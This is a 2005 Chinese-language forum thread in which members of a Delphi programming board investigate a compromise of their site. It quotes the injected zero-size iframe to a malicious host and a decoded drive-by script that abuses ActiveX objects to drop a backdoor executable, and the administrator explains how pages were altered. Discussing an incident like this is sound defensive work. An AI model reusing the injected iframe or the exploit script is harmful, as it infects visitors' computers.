全國最多中醫師線上諮詢網站-台灣中醫網
發文 回覆 瀏覽次數:1370
推到 Plurk!
推到 Facebook!

本站被入侵了嗎?

 
qoo1234
版主


發表:256
回覆:1167
積分:659
註冊:2003-02-24

發送簡訊給我
#1 引用回覆 回覆 發表時間:2005-11-23 18:23:37 IP:220.131.xxx.xxx 未訂閱
本站被入侵了嗎?    檢查每個網頁程式碼最後一段table上方出現以下網址:    http://fucktw.go.3322.org    每個網頁跳出說明視窗: 由http://www.650411.net/default.htm 引起的        網海無涯,唯學是岸! 發表人 - qoo1234 於 2005/11/23 18:32:11 發表人 - qoo1234 於 2005/11/23 18:33:54
pcplayer99
尊榮會員


發表:146
回覆:790
積分:632
註冊:2003-01-21

發送簡訊給我
#2 引用回覆 回覆 發表時間:2005-11-24 13:58:04 IP:219.133.xxx.xxx 未訂閱
查看页面 Source ,的确发现一个大小为 0 的 IFrame:    <iframe src="http://fucktw.go.3322.org" width=0 height=0></iframe> 连接的这个 fucktw.go.3322.org ,是一个动态 IP 解析的 Domain name. 3322.org 是提供动态 IP 解析服务的。 fucktw.go.3322.org 这个 domain name 似乎没有被解析,可能是它的主人没有开自己的电脑。因为最近几天我 ping 它,得到的 IP 都和 www.3322.org 本身一致。 它把自己隐藏在一个大小为 0 的 IFrame 里,似乎是想让大家访问它却不被发现。不排除它在自己的页面内暗藏病毒或木马的可能。
builder78
初階會員


發表:36
回覆:100
積分:47
註冊:2003-02-03

發送簡訊給我
#3 引用回覆 回覆 發表時間:2005-11-26 12:17:44 IP:221.169.xxx.xxx 未訂閱
上KTop後 我就中毒了(會跑出說明視窗) 與 產生莫名奇妙的執行檔c:\arcldrer.exe => 還向外連線 殺也殺不掉 檔案總管也當掉了....慘阿 電腦不穩中..... Norton 防毒 真沒用 ..>< ********************************************************* 有系統的知識才是力量
william
版主


發表:66
回覆:2535
積分:3048
註冊:2002-07-11

發送簡訊給我
#4 引用回覆 回覆 發表時間:2005-11-26 14:34:35 IP:218.190.xxx.xxx 未訂閱
小弟追蹤了一下, http://www.650411.net/default.htm 會回傳一個 script, decode 後如下:    
<HTML>
<BODY>


<OBJECT id="window98" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT> <OBJECT id="windXP" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT> <OBJECT id="cnbore2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT>
var tk=navigator.userAgent; if(tk.indexOf('MSIE 6.0')>=1){ windXP.Click(); }else{ window98.Click(); } setTimeout("cnbore2.Click();",0); </BODY></HTML>
bbs003302.gif 是另一個 script 而 bbs003302.css 則是一個 exe,從其 version info 得知原名為 HideDownFile.exe,Icon 則為 MFC 預設 icon。我想暫時還是用 Firefox 好了,不竟 ActiveX 還是比較危險 希望 face='Lucida Console'>http://pywong.hk.st
P.D.
版主


發表:603
回覆:4038
積分:3874
註冊:2006-10-31

發送簡訊給我
#5 引用回覆 回覆 發表時間:2005-11-26 22:01:52 IP:61.71.xxx.xxx 未訂閱
引言: 小弟追蹤了一下, http://www.650411.net/default.htm 會回傳一個 script, decode 後如下:
<HTML>
<BODY>


<OBJECT id="window98" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT> <OBJECT id="windXP" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT> <OBJECT id="cnbore2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT>
var tk=navigator.userAgent; if(tk.indexOf('MSIE 6.0')>=1){ windXP.Click(); }else{ window98.Click(); } setTimeout("cnbore2.Click();",0); </BODY></HTML>
bbs003302.gif 是另一個 script 而 bbs003302.css 則是一個 exe,從其 version info 得知原名為 HideDownFile.exe,Icon 則為 MFC 預設 icon。我想暫時還是用 Firefox 好了,不竟 ActiveX 還是比較危險 希望 face='Lucida Console'>http://pywong.hk.st
william版主有追蹤到, 不知道是否有解決之道, 因為已經好幾天了, 最近我實在不太敢上來, 怕萬一那天我的系統擋不住! 謝謝!
william
版主


發表:66
回覆:2535
積分:3048
註冊:2002-07-11

發送簡訊給我
#6 引用回覆 回覆 發表時間:2005-11-26 23:47:19 IP:218.190.xxx.xxx 未訂閱
引言: william版主有追蹤到, 不知道是否有解決之道, 因為已經好幾天了, 最近我實在不太敢上來, 怕萬一那天我的系統擋不住! 謝謝!
解決之道?我想應該先將該木馬從 KTop 清除吧,這個可能要勞煩天使大大了...小弟暫時還是用不支援 ActiveX 的 browser (Firefox) 上 KTop。話說回來,小弟一直用 IE 來瀏覽 KTop,好像沒甚麼異樣 小弟的配置: > < face='Lucida Console'>http://pywong.hk.st
gyl
一般會員


發表:0
回覆:15
積分:13
註冊:2005-01-10

發送簡訊給我
#7 引用回覆 回覆 發表時間:2005-11-27 03:41:22 IP:211.76.xxx.xxx 未訂閱
天..我根本不知道有這回事...不過我卻沒出現問題,已經整個星期都沒關了... Internet Browser: Maxthon
rogan321
高階會員


發表:21
回覆:307
積分:200
註冊:2003-05-15

發送簡訊給我
#8 引用回覆 回覆 發表時間:2005-11-27 15:27:49 IP:219.68.xxx.xxx 未訂閱
引言: 天..我根本不知道有這回事...不過我卻沒出現問題,已經整個星期都沒關了... Internet Browser: Maxthon
攻擊好像只針對XP和98和IE6.0以上,使用2k不會有問題 一開始是拼命要執行NTLOADER.HTA這支惡意程式 目前則是產生arcldrer.exe這支後門程式來執行 收割期了吧~~
enter2004
初階會員


發表:51
回覆:94
積分:34
註冊:2005-04-10

發送簡訊給我
#9 引用回覆 回覆 發表時間:2005-11-27 19:08:03 IP:218.174.xxx.xxx 未訂閱
可是到現在站長怎麼還沒把病毒清掉阿~!! 搞不懂~
------
人生就像泡泡一樣,乘著風被吹著跑,等你發現時已經消失了。
就在快要消失的瞬間,希望能再飛高一點,
但是回神時總是慢了一步。
Morris
一般會員


發表:1
回覆:5
積分:6
註冊:2002-03-13

發送簡訊給我
#10 引用回覆 回覆 發表時間:2005-11-28 02:14:02 IP:220.137.xxx.xxx 未訂閱
小弟防毒裝卡巴斯基,每開一次網頁卡巴斯基都會出現 有潛在的危險程式Exploit.VBS.Phel.cb. @@"
領航天使
站長


發表:12216
回覆:4186
積分:4084
註冊:2001-07-25

發送簡訊給我
#11 引用回覆 回覆 發表時間:2005-11-29 10:09:57 IP:220.134.xxx.xxx 未訂閱
很抱歉,因為站長出國一個星期,回國後才獲知這個消息! 對於造成各位網友的困擾,在此鄭重道歉! 這個病毒暫時清除! 他的手法是搜尋.HTM/.HTML/.ASP/.PHP等Script程式檔案 找到 < / body > 語法處 , 在前面加上 < i frame src="http://fucktw.go.3322.org" width=0 height=0> < / iframe> 讓本站網頁導入fucktw.go.3322.org這個病毒網頁中 目前本站採取了一些防範措施,希望能奏效, 猜測是利用IIS的漏洞進來的! 本站對此人的行為表示嚴厲的譴責, 並且已經保留相關證據, 保留日後的法律追究權利! 再次感謝各位熱心的協助! 站長敬上 ~~~Delphi K.Top討論區站長~~~
------
~~~Delphi K.Top討論區站長~~~
gyl
一般會員


發表:0
回覆:15
積分:13
註冊:2005-01-10

發送簡訊給我
#12 引用回覆 回覆 發表時間:2005-11-30 23:23:30 IP:211.76.xxx.xxx 未訂閱
引言:
引言: 天..我根本不知道有這回事...不過我卻沒出現問題,已經整個星期都沒關了... Internet Browser: Maxthon
攻擊好像只針對XP和98和IE6.0以上,使用2k不會有問題 一開始是拼命要執行NTLOADER.HTA這支惡意程式 目前則是產生arcldrer.exe這支後門程式來執行 收割期了吧~~
我是XP,Maxthon是IE核心,我發現是我的Norton的Internet Worm Protection幫我擋掉了(感激不盡啊)
系統時間:2024-04-27 8:36:55
聯絡我們 | Delphi K.Top討論版
本站聲明
1. 本論壇為無營利行為之開放平台,所有文章都是由網友自行張貼,如牽涉到法律糾紛一切與本站無關。
2. 假如網友發表之內容涉及侵權,而損及您的利益,請立即通知版主刪除。
3. 請勿批評中華民國元首及政府或批評各政黨,是藍是綠本站無權干涉,但這裡不是政治性論壇!